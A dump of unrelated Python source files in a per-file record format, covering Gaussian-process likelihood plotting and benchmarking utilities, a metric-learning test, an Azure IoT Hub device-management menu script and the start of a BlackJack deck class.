def test_instantiation(self):
assert_raises(TypeError, MetricLearningAlgorithm, self.X, self.y)
MLA = ConcreteMetricLearningAlgorithm(self.X, self.y, parameters = {'s': [3, 2, 1], 'tenor': 54})
print MLA.parameters.keys()
assert_equal(MLA.parameters['s'], [3, 2, 1])
assert_equal(MLA.parameters['tenor'], 54)
assert_equal(MLA.foo, 'bar')
MLA = ConcreteMetricLearningAlgorithm(self.X, self.y)
print MLA.parameters
assert_equal(MLA.parameters['s'], [1, 2, 3])
assert_equal(MLA.parameters['tenor'], 45)
assert_equal(MLA.foo, 'bar')
class ConcreteMetricLearningAlgorithm(MetricLearningAlgorithm):
"""
For testing the abstract MetricLearningAlgorithm class
"""
def set_default_parameters(self):
self.parameters = {'s': [1,2,3], 'tenor': 45, 'sax': 90}
def run_algorithm_specific_setup(self):
self.foo = 'bar'
def learn_metric(self):
return np.eye(3)
``` |
{
"source": "johncoltrane1/saferGPMLE",
"score": 2
} |
#### File: libs/utils/gpy_plotting_lib.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
import libs.utils.gpy_finite_diff as gpy_finite_diff
import libs.utils.gpy_estimation_lib as gpy_estimation_lib
from GPy.util.linalg import pdinv, dpotrs
from GPy.util import diag
import sklearn.linear_model
def plot_paramz_likelihood_path(model, label):
nominal = np.array([27.04301504, 83.37540132])
param_one = nominal.copy()
param_two = model.X.std(0)
scipy_param_one = model.kern.lengthscale.constraints.properties()[0].finv(param_one)
scipy_param_two = model.kern.lengthscale.constraints.properties()[0].finv(param_two)
grid_1d = np.linspace(-0.3, 1.5, 1000)
y_1d = []
for i in range(grid_1d.shape[0]):
x = grid_1d[i]
scipy_param = x * scipy_param_one + (1 - x) * scipy_param_two
model.kern.lengthscale.optimizer_array = scipy_param.copy()
model = gpy_estimation_lib.analytical_mean_and_variance_optimization(model)
y_1d.append(model.objective_function())
plt.plot(grid_1d, y_1d, label=label)
def plot_likelihood_path(model, estimate_mean=True, estimate_var=True):
param_one = np.array([27.04301504, 83.37540132])
param_two = np.array([8.76182561, 21.70946319])
mean_one = 1210.116506
variance_one = 2274398.204448
mean_two = 176.754115
variance_two = 18221.51397
grid_1d = np.linspace(0, 1, 1000)
y_1d = []
gradient_norm = []
for i in range(grid_1d.shape[0]):
x = grid_1d[i]
param = x * param_one + (1 - x) * param_two
if estimate_mean:
mean_value = None
else:
mean_value = np.array([[x * mean_one + (1 - x) * mean_two]])
if estimate_var:
variance_value = None
else:
variance_value = np.array([[x * variance_one + (1 - x) * variance_two]])
obj, grad, hessian, model = gpy_finite_diff.get_cost_and_grad_and_hessian(model, param, mean_value, variance_value)
if i == 0:
print("first mode, obj : {}, grad : {}, hessian : \n {}, \n spec hessian : {}".format(obj, grad,
hessian,
np.linalg.eig(
hessian)[0]))
elif i == grid_1d.shape[0] - 1:
print("second mode, obj : {}, grad : {}, hessian : \n {}, \n spec hessian : {}".format(obj, grad,
hessian,
np.linalg.eig(
hessian)[0]))
y_1d.append(obj)
gradient_norm.append((grad ** 2).sum())
plot_xaxis = "path : lengthscales"
if not estimate_mean:
plot_xaxis = plot_xaxis + ', mean'
if not estimate_var:
plot_xaxis = plot_xaxis + ', var'
plt.figure()
plt.plot(grid_1d, y_1d)
plt.title("NLL vs Path")
plt.xlabel(plot_xaxis)
plt.ylabel("Negative log likelihood")
plt.show()
plt.figure()
plt.semilogy()
plt.plot(grid_1d, gradient_norm)
plt.title("Log gradient norm vs Path")
plt.xlabel(plot_xaxis)
plt.ylabel("Log gradient norm of negative log likelihood")
plt.show()
def plot_neg_likelihood_var(model):
var_init = model.Mat52.variance.values[0]
cost_var_init = model._objective_grads(model.optimizer_array)[0]
grid_1d = np.linspace(-1, 1, 2001)
grid_1d = [var_init * math.exp(x * math.log(10)) for x in grid_1d]
y_1d = []
for x in grid_1d:
model.Mat52.variance = x
y_1d.append((model._objective_grads(model.optimizer_array)[0]))
plt.figure()
plt.semilogx()
plt.plot(grid_1d, y_1d)
plt.title("Negative log likelihood vs var : lengthscales : [{}, {}]".format(model.Mat52.lengthscale[0],
model.Mat52.lengthscale[1]))
plt.xlabel("var")
plt.ylabel("Negative log likelihood")
plt.vlines(var_init, ymin=min(y_1d), ymax=max(y_1d), label='estimated_var : {0:.3f}, nll : {1:.3f}'.format(var_init, cost_var_init))
plt.legend()
plt.show()
def plot_multistart_optimization(model, n, mean_value,
variance_value,
optimum,
init_type):
model.constmap.C = mean_value
model.Mat52.variance = variance_value
bounds = [-1, 1]
log_rho_data = np.random.random((n, 2)) * (bounds[1] - bounds[0]) + bounds[0] + np.log10(optimum)
rho_data = np.exp(log_rho_data * math.log(10))
data = pd.DataFrame({'rho1': [], 'rho2': [], 'sigma2': [], 'm': [], 'cost': [], 'status': []})
for rho in rho_data:
model.Mat52.lengthscale = rho
if init_type == 'profiled':
model = gpy_estimation_lib.analytical_mean_and_variance_optimization(model)
elif init_type == 'classic':
model.constmap.C = model.Y.mean()
model.kern.variance = model.Y.var()
else:
ValueError(init_type)
optim = model.optimize()
data = data.append(pd.DataFrame({'rho1': [model.Mat52.lengthscale[0]],
'rho2': [model.Mat52.lengthscale[1]],
'sigma2': model.Mat52.variance,
'm': [model.constmap.C],
'cost': [model._objective_grads(model.optimizer_array)[0]],
'status': optim.status}),
ignore_index=True)
colors = {"Errorb'ABNORMAL_TERMINATION_IN_LNSRCH'": 'red', 'Converged': 'blue', 'Maximum number of f evaluations reached': 'green'}
if not data['status'].apply(lambda x: x in colors.keys()).min():
raise ValueError('Unknown status : {}'.format(data['status'].unique()))
plt.figure()
plt.scatter(x=np.log10(data['rho1']), y=np.log10(data['rho2']),
c=data['status'].apply(lambda x: colors[x]))
plt.scatter(x=math.log10(optimum[0]), y=math.log10(optimum[1]), c='k')
plt.xlabel("ln(rho_1)")
plt.ylabel("ln(rho_2)")
plt.vlines(x=math.log(10) * bounds[0] + math.log10(optimum[0]),
ymin=math.log(10) * bounds[0] + math.log10(optimum[1]),
ymax=math.log(10) * bounds[1] + math.log10(optimum[1]),
linestyles="--", colors="g")
plt.vlines(x=math.log(10) * bounds[1] + math.log10(optimum[0]),
ymin=math.log(10) * bounds[0] + math.log10(optimum[1]),
ymax=math.log(10) * bounds[1] + math.log10(optimum[1]),
linestyles="--", colors="g")
plt.hlines(y=math.log(10) * bounds[0] + math.log10(optimum[1]),
xmin=math.log(10) * bounds[0] + math.log10(optimum[0]),
xmax=math.log(10) * bounds[1] + math.log10(optimum[0]),
linestyles="--", colors="g")
plt.hlines(y=math.log(10) * bounds[1] + math.log10(optimum[1]),
xmin=math.log(10) * bounds[0] + math.log10(optimum[0]),
xmax=math.log(10) * bounds[1] + math.log10(optimum[0]),
linestyles="--", colors="g")
plt.plot([math.log10(optimum[0]) - 2, math.log10(optimum[0]) + 2],
[math.log10(optimum[1]) - 2, math.log10(optimum[1]) + 2],
label='constant anisotropy')
plt.legend()
plt.title(init_type)
plt.show()
#############################################
plt.figure()
plt.scatter(x=np.log10(data['rho1']), y=np.log10(data['sigma2']),
c=data['status'].apply(lambda x: colors[x]))
plt.scatter(x=math.log10(optimum[0]), y=math.log10(variance_value), c='k')
plt.vlines(x=math.log(10) * bounds[0] + math.log10(optimum[0]), ymin=np.log10(data['sigma2']).min(), ymax=np.log10(data['sigma2']).max(),
linestyles="--", colors="g")
plt.vlines(x=math.log(10) * bounds[1] + math.log10(optimum[0]), ymin=np.log10(data['sigma2']).min(), ymax=np.log10(data['sigma2']).max(),
linestyles="--", colors="g")
plt.plot([np.log10(data['rho1']).min(), np.log10(data['rho1']).max()],
[math.log10(variance_value) - (math.log10(optimum[0]) - np.log10(data['rho1']).min())*5,
math.log10(variance_value) + (np.log10(data['rho1']).max() - math.log10(optimum[0]))*5], label='constant microergodicity')
plt.xlabel("ln(rho_1)")
plt.ylabel("ln(sigma2)")
plt.legend()
plt.title(init_type)
plt.show()
return data
def get_noise_level(x, y):
sk_model = sklearn.linear_model.LinearRegression(fit_intercept=True)
X_data = np.concatenate((np.array(x).reshape(-1, 1), (np.array(x)**2).reshape(-1, 1)), axis=1)
Y_data = np.array(y).reshape(-1, 1)
sk_model.fit(X_data, Y_data)
print("noise level (std) : {}".format((Y_data - sk_model.predict(X_data)).std(ddof=3)))
def plot_taylor(model, idx_param, diagonalize=False, width=1e-2, n=1000):
obj_value, grad = model._objective_grads(model.optimizer_array)
print("obj value : {}".format(obj_value))
hessian, model = gpy_finite_diff.get_hessian(model)
if diagonalize:
v, W = np.linalg.eig(hessian)
direction = W[:, idx_param]
else:
direction = np.zeros([model.optimizer_array.shape[0]])
direction[idx_param] = 1
array = model.optimizer_array.copy()
dx_vector = np.linspace(-width / 2, width / 2, n)
y = []
y_order_1 = []
y_order_2 = []
for dx in dx_vector:
d = direction.copy() * dx
obj, _ = model._objective_grads(model.optimizer_array + d)
y.append(obj)
model.optimizer_array = array.copy()
y_order_1.append(obj_value + (d * grad).sum())
y_order_2.append(obj_value + (d * grad).sum() + 0.5 * (d.reshape(1, -1) @ hessian @ d.reshape(-1, 1))[0, 0])
fig, ax = plt.subplots()
plt.plot(dx_vector, y, label="NLL")
##############################################
sk_model = sklearn.linear_model.LinearRegression(fit_intercept=True)
X_data = np.concatenate((np.array(dx_vector).reshape(-1, 1), (np.array(dx_vector)**2).reshape(-1, 1)), axis=1)
Y_data = np.array(y).reshape(-1, 1)
sk_model.fit(X_data, Y_data)
plt.plot(dx_vector, sk_model.predict(X_data), label='Best linear fit')
##############################################
ax.ticklabel_format(useOffset=False)
plt.axvline(x=0, color='red', label='')
plt.legend()
plt.show()
get_noise_level(dx_vector, y)
def decompose_all(model, idx_param, diagonalize=False, width=1e-2, n=1000):
obj_value, grad = model._objective_grads(model.optimizer_array)
print("obj value : {}".format(obj_value))
hessian, model = gpy_finite_diff.get_hessian(model)
if diagonalize:
v, W = np.linalg.eig(hessian)
# Slow variation direction : array([ 9.99997623e-01, -2.06640309e-03, -4.50014843e-04, -5.31242312e-04])
direction = W[:, idx_param]
eig_value = v[idx_param]
else:
direction = np.zeros([model.optimizer_array.shape[0]])
direction[idx_param] = 1
array = model.optimizer_array.copy()
dx_vector = np.linspace(-width / 2, width / 2, n)
y_data = []
y_reg = []
for dx in dx_vector:
d = direction.copy() * dx
model.optimizer_array = model.optimizer_array + d
m = model.mean_function.f(model.X)
variance = model.likelihood.gaussian_variance(model.Y_metadata)
YYT_factor = model.Y_normalized - m
K = model.kern.K(model.X)
Ky = K.copy()
diag.add(Ky, variance)
Wi, LW, LWi, W_logdet = pdinv(Ky)
alpha, _ = dpotrs(LW, YYT_factor, lower=1)
y_reg.append(0.5*(- model.Y.shape[1] * W_logdet))
y_data.append(0.5*(- np.sum(alpha * YYT_factor)))
model.optimizer_array = array.copy()
plt.subplots(1, 2)
if diagonalize:
plt.suptitle("Eigen axis : {}, eigen value : {} \n eigen vector: ({})".format(idx_param,
"{:.4E}".format(eig_value),
','.join(["{:.6}".format(x) for x in direction])))
else:
plt.suptitle("Axis")
plt.subplot(1, 2, 1)
plt.title("Data term")
plt.plot(dx_vector, y_data, label="Data term")
plt.subplot(1, 2, 2)
plt.title("Regularization term")
plt.plot(dx_vector, y_reg, label="Regularization term")
plt.show()
print("Regularizer")
get_noise_level(dx_vector, y_reg)
print("Data")
get_noise_level(dx_vector, y_data)
def plot_model(model, x_train, y_train, x_grid, y_grid, title):
_, ax = plt.subplots()
plt.plot(x_grid, y_grid, 'k', label='truth')
plt.plot(x_train, y_train, 'ko', label='observed')
mu, var = model.predict(x_grid)
var[var <= 0] = 0
plt.plot(x_grid, mu, 'r', label='mu')
plt.plot(x_grid, mu - np.vectorize(math.sqrt)(var), 'b', label='mu - sigma')
plt.plot(x_grid, mu + np.vectorize(math.sqrt)(var), 'b', label='mu + sigma')
ax.fill_between(x_grid.reshape(-1), (mu - np.vectorize(math.sqrt)(var)).reshape(-1),
(mu + np.vectorize(math.sqrt)(var)).reshape(-1), color='#539caf', alpha=0.4)
plt.legend()
plt.title(title)
plt.show()
```
#### File: libs/utils/metrics_computations.py
```python
import scipy.stats
import numpy as np
import math
def get_gaussian_alpha_coverage(y, mu_pred, var_pred, alpha):
assert mu_pred.shape == var_pred.shape, "Shape issue"
assert isinstance(alpha, float), "alpha must be float"
assert np.all(var_pred > 0)
lower = scipy.stats.norm.ppf((1 - alpha) / 2, loc=mu_pred, scale=np.vectorize(math.sqrt)(var_pred))
upper = scipy.stats.norm.ppf(1 - (1 - alpha) / 2, loc=mu_pred, scale=np.vectorize(math.sqrt)(var_pred))
assert (y.shape == lower.shape) and (y.shape == upper.shape), \
"Shape issue : {}, {} and {}".format(y.shape, lower.shape, upper.shape)
is_alpha_credible = np.logical_and(lower <= y, y <= upper).astype(float)
return is_alpha_credible.mean()
def get_residuals(mu_pred, y):
assert isinstance(mu_pred, np.ndarray) and isinstance(y, np.ndarray), 'Type issue'
assert mu_pred.shape == y.shape and mu_pred.ndim == 1, 'Shape issue'
residuals = y - mu_pred
return residuals
def get_mse(mu_pred, y):
residuals = get_residuals(mu_pred, y)
return (residuals**2).mean()
def get_vse(mu_pred, y):
residuals = get_residuals(mu_pred, y)
return (residuals**2).var()
def get_mae(mu_pred, y):
residuals = get_residuals(mu_pred, y)
return (abs(residuals)).mean()
def get_scaled_mse(mu_pred, var_pred, y):
residuals = get_residuals(mu_pred, y)
assert isinstance(residuals, np.ndarray) and isinstance(var_pred, np.ndarray), 'Type issue'
assert residuals.shape == var_pred.shape and var_pred.ndim == 1, 'Shape issue'
assert np.all(var_pred > 0)
return ((residuals**2) / var_pred).mean()
```
#### File: bench/gpy_wrapper_misc/gpy_estimation_lib_restarts_experiments.py
```python
import time
from gpy_wrapper.gpy.libs.utils.gpy_estimation_lib import custom_optimize_restarts, gaussian_random_init, optimize_from_start
import numpy as np
def trainer_all(model, options, profiler=None, ipython_notebook=False, bench_type='single'):
if bench_type == 'single':
ll = launch_sessions_all(model=model, ipython_notebook=ipython_notebook, profiler=profiler, **options)
elif bench_type == 'monte-carlo':
ll = launch_sessions_all_monte_carlo(model=model, ipython_notebook=ipython_notebook, profiler=profiler, **options)
else:
raise ValueError(bench_type)
return ll
def launch_sessions_all(
model,
optim_scheme,
gtol,
bfgs_factor,
ipython_notebook,
profiler
):
status = 'untrained'
ll = {}
idx = 0
start = time.time()
for scheme in optim_scheme:
model, status = custom_optimize_restarts(model=model, n_multistarts=scheme[0],
gtol=gtol, bfgs_factor=bfgs_factor,
std_perturbations=scheme[1],
profiler=profiler,
ipython_notebook=ipython_notebook)
if profiler is not None:
model = profiler(model)
idx += 1
end = time.time()
# For studying the improvements over the restarts
# print("\nscheme : {}, cost : {}".format(scheme, model.objective_function()))
ll[str(scheme) + "_nll_" + str(idx)] = model.objective_function()
ll[str(scheme) + "_time_" + str(idx)] = end - start
return ll
def launch_sessions_all_monte_carlo(
model,
optim_scheme,
gtol,
bfgs_factor,
ipython_notebook,
profiler
):
for scheme in optim_scheme:
model, ll = custom_optimize_restarts_misc(model=model, n_multistarts=scheme[0],
gtol=gtol, bfgs_factor=bfgs_factor,
std_perturbations=scheme[1],
profiler=profiler,
ipython_notebook=ipython_notebook)
if profiler is not None:
model = profiler(model)
return ll
def custom_optimize_restarts_misc(model, n_multistarts, gtol, bfgs_factor, std_perturbations, profiler, ipython_notebook):
assert n_multistarts > 0, "multistarts should be > 0, {}".format(n_multistarts)
std_perturbations_vector = std_perturbations * np.ones([model.optimizer_array.shape[0]])
mean_index = [
i for i in range(model.parameter_names_flat().shape[0])
if 'constmap.C' in model.parameter_names_flat()[i]
]
std_perturbations_vector[mean_index] = model.Y_normalized.std() * std_perturbations_vector[mean_index]
inits = gaussian_random_init(model, n_multistarts, std_perturbations_vector)
scores = []
optimum = []
statuses = []
idx = 0
ll = {}
for x in inits:
assert x.shape == model.optimizer_array.shape, "Shape issue."
model.optimizer_array = x
start = time.time()
model, status = optimize_from_start(model, gtol, bfgs_factor, ipython_notebook)
if profiler is not None:
model = profiler(model)
end = time.time()
optimum.append(model.optimizer_array.copy())
scores.append(model.objective_function())
statuses.append(status)
idx += 1
ll["nll_" + str(idx)] = model.objective_function()
ll["time_" + str(idx)] = end - start
argmin = np.array(scores).argmin()
model.optimizer_array = optimum[argmin]
return model, ll
```
#### File: code/report/multiple_loo_boxplot.py
```python
import matplotlib.pyplot as plt
import os
import pandas as pd
import numpy as np
import sys
# --- README ---
'''
This script generates boxplots for range(lengthscale) values for LOO
'''
# --- To Run ---
'''
Syntax :
python multiple_loo_boxplot.py bench_num scheme1 scheme2 dataset_name dimension output
Example :
python3 multiple_loo_boxplot.py 2 gpy_mle0133 gpy_mle3021 borehole 20d f_1
'''
# --- Methods ---
bench_num = sys.argv[1]
method = [sys.argv[2], sys.argv[3]]
dataset = [str(sys.argv[4]), sys.argv[5]]
output = str(sys.argv[6])
print('generating box plots for : \n', method)
# --- File name parsing utilities ---
def get_problem_and_dimension(file):
splited_file_name = file.split('_')
problem = "_".join(file.split('_')[0:(len(splited_file_name) - 1)])
d = splited_file_name[len(splited_file_name) - 1].replace('.csv', '')
return problem, d
# --- Let's do the job ---
data_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method[0]))
data_dir_full = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method[0]))
data_dir_1 = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method[1]))
data_dir_full_1 = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method[1]))
# -- Retrieve data from methods ---
def df_generator(data_dir, tag):
for file in os.listdir(data_dir):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data = pd.read_csv(os.path.join(data_dir, file), sep=',', index_col=0)
df = pd.DataFrame(data)
ls = []
to_remove = []
for i in df.columns:
if 'ls_dim' in i:
ls.append(i)
else:
to_remove.append(i)
df = df.loc[df['output'] == output]
for i in ls:
df[i] = np.log(df[i])
df = df.dropna()
df = df.drop(to_remove, axis=1)
df['method'] = np.array(df.shape[0]*[tag])
return df
# --- generating dataframes ---
df = df_generator(data_dir, 'default')
df_full = df_generator(data_dir_full, 'default')
df_1 = df_generator(data_dir_1, 'healed')
df_full_1 = df_generator(data_dir_full_1, 'healed')
# --- generating boxplot ---
# data to plot
A = [df['ls_dim_5'], df_1['ls_dim_5']]
B = [df['ls_dim_6'], df_1['ls_dim_6']]
C = [df['ls_dim_7'], df_1['ls_dim_7']]
D = [df['ls_dim_8'], df_1['ls_dim_8']]
A_1 = [df_full['ls_dim_5'], df_full_1['ls_dim_5']]
B_1 = [df_full['ls_dim_6'], df_full_1['ls_dim_6']]
C_1 = [df_full['ls_dim_7'], df_full_1['ls_dim_7']]
D_1 = [df_full['ls_dim_8'], df_full_1['ls_dim_8']]
def color_scheme(bp, bp_1):
for median in bp['medians']:
median.set(color='g', linewidth=2)
for median in bp_1['medians']:
median.set(color='r', linewidth=2)
for box in bp_1['boxes']:
box.set(color='r', linewidth=2)
for whisker in bp_1['whiskers']:
whisker.set(color='r', linewidth=2)
for cap in bp_1['caps']:
cap.set(color='r', linewidth=2)
fig = plt.figure(figsize=(9, 6))
ax = plt.axes()
# first boxplot pair
bp = ax.boxplot(A, positions=[1, 2], widths=0.6)
bp_1 = ax.boxplot(A_1, positions=[1, 2], widths=0.6)
color_scheme(bp, bp_1)
# second boxplot pair
bp = ax.boxplot(B, positions=[4, 5], widths=0.6)
bp_1 = ax.boxplot(B_1, positions=[4, 5], widths=0.6)
color_scheme(bp, bp_1)
# thrid boxplot pair
bp = ax.boxplot(C, positions=[7, 8], widths=0.6)
bp_1 = ax.boxplot(C_1, positions=[7, 8], widths=0.6)
color_scheme(bp, bp_1)
# fourth boxplot pair
bp = ax.boxplot(D, positions=[10, 11], widths=0.6)
bp_1 = ax.boxplot(D_1, positions=[10, 11], widths=0.6)
color_scheme(bp, bp_1)
# set axes limits and labels
plt.xlim(0, 12)
# plt.ylim(0,9)
ax.set_xticklabels(['1', '2', '3', '4'])
ax.set_xticks([1.5, 4.5, 7.5, 10.5])
plt.xlabel('input dimensions', fontsize=14)
plt.ylabel('lengthscale (in log scale)', fontsize=14)
plt.title('Boxplot of LOO estimated lengthscale')
plt.grid(True)
plt.show()
```
#### File: code/report/nll_boxplot.py
```python
import matplotlib.pyplot as plt
import os
import pandas as pd
import numpy as np
import sys
# --- README ---
'''
This script generates boxplots for NLL differences of default & healed
as obtained with LOO
'''
# --- To Run ---
'''
Syntax :
python nll_boxplot.py bench_num scheme1 scheme2 dataset_name dimension
Example :
python3 nll_boxplot.py 2 gpy_mle0133 gpy_mle3021 g10 3d
'''
# --- Methods ---
bench_num = sys.argv[1]
method = sys.argv[2]
method1 = sys.argv[3]
dataset = [str(sys.argv[4]), sys.argv[5]]
print('generating box plots for : \n', [method, method1])
# --- File name parsing utilities ---
def get_problem_and_dimension(file):
splited_file_name = file.split('_')
problem = "_".join(file.split('_')[0:(len(splited_file_name) - 1)])
d = splited_file_name[len(splited_file_name) - 1].replace('.csv', '')
return problem, d
# --- Let's do the job ---
data_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method1))
data_dir_full = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method1))
data_dir_healed = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench2', 'data_no_std', str(method))
data_dir_full_healed = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'results', 'bench1', 'proposed', str(method))
# -- Retrieve data from methods ---
cost_dict = {}
cost_dict_healed = {}
cost_dict_full = {}
cost_dict_full_healed = {}
for file in os.listdir(data_dir):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data = pd.read_csv(os.path.join(data_dir, file), sep=',', index_col=0)[['cost', 'output']]
df = pd.DataFrame(data)
for output in list(df['output']):
cost_dict[output] = list(df.loc[df['output'] == output]['cost'])
for file in os.listdir(data_dir_healed):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data = pd.read_csv(os.path.join(data_dir_healed, file), sep=',', index_col=0)[['cost', 'output']]
df = pd.DataFrame(data)
for output in list(df['output']):
cost_dict_healed[output] = list(df.loc[df['output'] == output]['cost'])
for file in os.listdir(data_dir_full):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data_full = pd.read_csv(os.path.join(data_dir_full, file), sep=',', index_col=0)[['cost', 'output']]
df_full = pd.DataFrame(data_full)
for output in list(df_full['output']):
cost_dict_full[output] = list(df_full.loc[df_full['output'] == output]['cost'])
for file in os.listdir(data_dir_full_healed):
problem, d = get_problem_and_dimension(file)
if [problem, d] == dataset:
data_full = pd.read_csv(os.path.join(data_dir_full_healed, file), sep=',', index_col=0)[['cost', 'output']]
df_full = pd.DataFrame(data_full)
for output in list(df_full['output']):
cost_dict_full_healed[output] = list(df_full.loc[df_full['output'] == output]['cost'])
# --- Box plot ---
fig = plt.figure(1, figsize=(9, 6))
ax = fig.add_subplot(111)
to_plot = []
to_plot_full = []
for i in list(df_full['output']):
# print('\n\n{}'.format(i))
temp = np.array(cost_dict[i]) - np.array(cost_dict_healed[i])
temp = temp[~np.isnan(temp)]
to_plot.append(temp)
to_plot_full.append(np.array(cost_dict_full[i]) - np.array(cost_dict_full_healed[i]))
plot_type = input('Type "h" for histogram : \n')
if plot_type == 'h':
plt.hist(to_plot, density=False, bins=10, edgecolor='black')
plt.xlabel('NLL_default - NLL_healed', fontsize=14)
plt.ylabel('frequency', fontsize=14)
plt.title('Histogram of NLL differences', fontsize=14)
plt.show()
else:
bp = ax.boxplot(to_plot)
bp1 = ax.boxplot(to_plot_full)
# change color and linewidth of the medians
for median in bp['medians']:
median.set(color='g', linewidth=2)
# change outline color, fill color and linewidth of the boxes
for box in bp1['boxes']:
# change outline color
box.set(color='r', linewidth=2)
# change color and linewidth of the whiskers
for whisker in bp1['whiskers']:
whisker.set(color='r', linewidth=2)
# change color and linewidth of the caps
for cap in bp1['caps']:
cap.set(color='r', linewidth=2)
for median in bp1['medians']:
median.set(color='r', linewidth=2)
plt.xlabel('output functions', fontsize=14)
plt.ylabel('NLL_default - NLL_healed', fontsize=14)
plt.title('Boxplot of difference in LOO estimated NLL of {}'.format(dataset[0] + '_' + str(dataset[1])), fontsize=14)
plt.grid(True)
ax.set_xticklabels(list(df_full['output']))
plt.show()
``` |
{
"source": "Johncon79/AZURE-IOT-Interface",
"score": 2
} |
#### File: Johncon79/AZURE-IOT-Interface/iotserver.py
```python
import sys
import iothub_service_client
from iothub_service_client import IoTHubRegistryManager, IoTHubRegistryManagerAuthMethod
from iothub_service_client import IoTHubDeviceMethod, IoTHubError, IoTHubDeviceTwin
#Enter IOTHub credentials
CONNECTION_STRING = ""
#Device name in iot hub
DEVICE_ID = "Recon"
DEVICE_STATUS=True
METHOD_NAME = ""
METHOD_PAYLOAD = ""
TIMEOUT = 60
TWIN_MSG = "{\"properties\":{\"desired\":{\"Photointerval\":10}}}"
def iothub_devicetwin():
iothub_twin_method = IoTHubDeviceTwin(CONNECTION_STRING)
twin_info = iothub_twin_method.get_twin(DEVICE_ID)
print ( "" )
print ( "Device Twin before update :" )
print ( "{0}".format(twin_info) )
twin_info = iothub_twin_method.update_twin(DEVICE_ID, TWIN_MSG)
print ( "" )
print ( "Device Twin after update :" )
print ( "{0}".format(twin_info) )
def list_devices():
print ( "GetDeviceList" )
number_of_devices = 3
iothub_registry_manager = IoTHubRegistryManager(CONNECTION_STRING)
dev_list = iothub_registry_manager.get_device_list(number_of_devices)
number_of_devices = len(dev_list)
print ( "Number of devices : {0}".format(number_of_devices) )
for device in range(0, number_of_devices):
title = "Device " + str(device)
print_device_info(title, dev_list[device])
if dev_list[device].connectionState != "CONNECTED":
DEVICE_STATUS=False
#print(DEVICE_STATUS)
print ( "" )
def print_device_info(title, iothub_device):
print ( title + ":" )
print ( "iothubDevice.deviceId = {0}".format(iothub_device.deviceId) )
print ( "iothubDevice.primaryKey = {0}".format(iothub_device.primaryKey) )
print ( "iothubDevice.secondaryKey = {0}".format(iothub_device.secondaryKey) )
print ( "iothubDevice.generationId = {0}".format(iothub_device.generationId) )
print ( "iothubDevice.eTag = {0}".format(iothub_device.eTag) )
print ( "iothubDevice.connectionState = {0}".format(iothub_device.connectionState) )
print ( "iothubDevice.connectionStateUpdatedTime = {0}".format(iothub_device.connectionStateUpdatedTime) )
print ( "iothubDevice.status = {0}".format(iothub_device.status) )
print ( "iothubDevice.statusReason = {0}".format(iothub_device.statusReason) )
print ( "iothubDevice.statusUpdatedTime = {0}".format(iothub_device.statusUpdatedTime) )
print ( "iothubDevice.lastActivityTime = {0}".format(iothub_device.lastActivityTime) )
print ( "iothubDevice.cloudToDeviceMessageCount = {0}".format(iothub_device.cloudToDeviceMessageCount) )
print ( "iothubDevice.isManaged = {0}".format(iothub_device.isManaged) )
print ( "iothubDevice.configuration = {0}".format(iothub_device.configuration) )
print ( "iothubDevice.deviceProperties = {0}".format(iothub_device.deviceProperties) )
print ( "iothubDevice.serviceProperties = {0}".format(iothub_device.serviceProperties) )
print ( "iothubDevice.authMethod = {0}".format(iothub_device.authMethod) )
print ( "" )
class ConnectionError(Exception):
pass
def methodUpdate(METHOD_NAME, METHOD_PAYLOAD ):
try:
if DEVICE_STATUS == False:
raise ConnectionError()
iothub_device_method = IoTHubDeviceMethod(CONNECTION_STRING)
#Skickar själva meddelandet och tar emot response
response = iothub_device_method.invoke(DEVICE_ID, METHOD_NAME, METHOD_PAYLOAD, TIMEOUT)
#Vad som skickades
print ( "" )
print ( "Device Method called" )
print ( "Device Method name : {0}".format(METHOD_NAME) )
print ( "Device Method payload : {0}".format(METHOD_PAYLOAD) )
print ( "" )
print ( "Response status : {0}".format(response.status) ) #200 kan t.ex vara Success
print ( "Response payload : {0}".format(response.payload) ) #Själva svaret från devicen. Tex Device starta utan problem
#raise IoTHubDeviceMethodError
except:
print("")
print ( "" )
print ( "" )
print("Oops!",sys.exc_info()[0],"occured.")
print("ERROR No deviced connected")
print("")
def iothub_MainMenu():
try:
#Main menu
while True:
print ( "" )
print("1 to list devices ")
print("2 to Start the service")
print("3 To Stop the service")
print("4 To update method")
inp = int((input()))
if inp == 1:
list_devices()
if inp == 2:
METHOD_NAME="Start" #Det som skickas
METHOD_PAYLOAD = "{\"StartService\":\"42\"}"
methodUpdate(METHOD_NAME, METHOD_PAYLOAD)
if inp == 3:
METHOD_NAME="Stop"
METHOD_PAYLOAD = "{\"StopService\":\"42\"}"
methodUpdate(METHOD_NAME, METHOD_PAYLOAD)
if inp == 4:
iothub_devicetwin()
try:
# Try Python 2.xx first
raw_input("Press Enter to continue...\n")
except:
pass
# Use Python 3.xx in the case of exception
input("Press Enter to continue...\n")
except IoTHubError as iothub_error:
print ( "" )
print ( "Unexpected error {0}".format(iothub_error) )
return
print ( "IoT Hub Service Interface" )
iothub_MainMenu()
``` |
{
"source": "JohnConnor94/BlackJackPy",
"score": 4
} |
#### File: BlackJackPy/lib/Deck.py
```python
import random
from lib.Card import Card
class Deck:
_seeds = ("Hearts", "Diamonds", "Clubs", "Spades")
_values = ("A", "2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K")
def __init__(self, jolly = False):
self._cards = [Card(v, s) for s in Deck._seeds for v in Deck._values]
if jolly:
self._cards += [("Joker", "Red"), ("Joker", "Black")]
def __len__(self) -> int:
return len(self._cards)
def __str__(self) -> str:
temp = f"Deck {super().__str__()}:\n"
index = 0
while index < len(self):
temp += f"{index + 1} - {self._cards[index]}\n"
